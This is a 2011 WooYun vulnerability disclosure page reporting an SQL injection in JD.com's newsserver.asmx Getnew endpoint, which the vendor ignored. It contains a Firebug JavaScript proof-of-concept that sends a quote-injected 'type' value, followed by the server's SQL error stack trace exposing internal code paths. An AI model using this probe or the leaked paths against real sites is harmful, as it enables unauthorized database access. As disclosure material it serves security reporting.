当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01860

漏洞标题:京东商城SQL注入BUG

相关厂商:京东商城

漏洞作者: Jannock

提交时间:2011-04-10 23:44

修复时间:2011-04-16 00:00

公开时间:2011-04-16 00:00

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-10: 细节已通知厂商并且等待厂商处理中
2011-04-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

发现京东商城SQL注入,但好像过滤得比较严重,也没详细研究,定为BUG吧!

详细说明:

http://www.360buy.com/newsserver.asmx?op=Getnew
type 参数存在SQL注入。

漏洞证明:

http://www.360buy.com/newsserver.asmx
fireBug 下
$.jmsajax(
{
url: "newsserver.asmx",
method: "Getnew",
data:
{
type:'ss\'',
num:3
},
success: function(data)
{

alert(data);
}
});
http://www.360buy.com/newsserver.asmx/Getnew
{"Message":"列名 \u0027ss\u0027 无效。","StackTrace":" 在 System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)\r\n 在 System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection)\r\n 在 System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj)\r\n 在 System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj)\r\n 在 System.Data.SqlClient.SqlDataReader.ConsumeMetaData()\r\n 在 System.Data.SqlClient.SqlDataReader.get_MetaData()\r\n 在 System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString)\r\n 在 System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async)\r\n 在 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result)\r\n 在 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method)\r\n 在 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method)\r\n 在 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)\r\n 在 Web2008.CatalogSystem.Dao.SqlHelper.ExecuteReader(String connectionString, CommandType cmdType, String cmdText, SqlParameter[] commandParameters) 位置 D:\\workspace\\www.360buy.com\\Web2008.CatalogSystem\\Dao\\SQLHelper.cs:行号 129\r\n 在 Web2008.CatalogSystem.Dao.CatalogDao.getnewslist(String type, String type2, Int32 num) 位置 D:\\workspace\\www.360buy.com\\Web2008.CatalogSystem\\Dao\\CatalogDao.cs:行号 633\r\n 在 Web2008.CatalogSystem.Service.CacheCatalogProvider.getnewslist(String type, String type2, Int32 num) 位置 D:\\workspace\\www.360buy.com\\Web2008.CatalogSystem\\Service\\CacheCatalogProvider.cs:行号 233\r\n 在 Web2008.UISystem.news.getnew(String type, String type2, Int32 num, String keys) 位置 D:\\workspace\\www.360buy.com\\Web2008.UISystem\\news.cs:行号 218\r\n 在 Web2008.UISystem.news.getnew(String type, String type2, Int32 num) 位置 D:\\workspace\\www.360buy.com\\Web2008.UISystem\\news.cs:行号 184\r\n 在 newsserver.Getnew(String type, Int32 num) 位置 d:\\workspace\\www.360buy.com\\www.360buy.com\\360buy.comWeb\\App_Code\\newsserver.cs:行号 70","ExceptionType":"System.Data.SqlClient.SqlException"}

修复方案:

您懂得!

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-04-16 00:00

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2011-04-11 14:25 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    等待内容公开

  2. 2012-05-12 22:54 | Power ( 实习白帽子 | Rank:54 漏洞数:22 | 还需要等待.........)

    京东.....不想说脏话.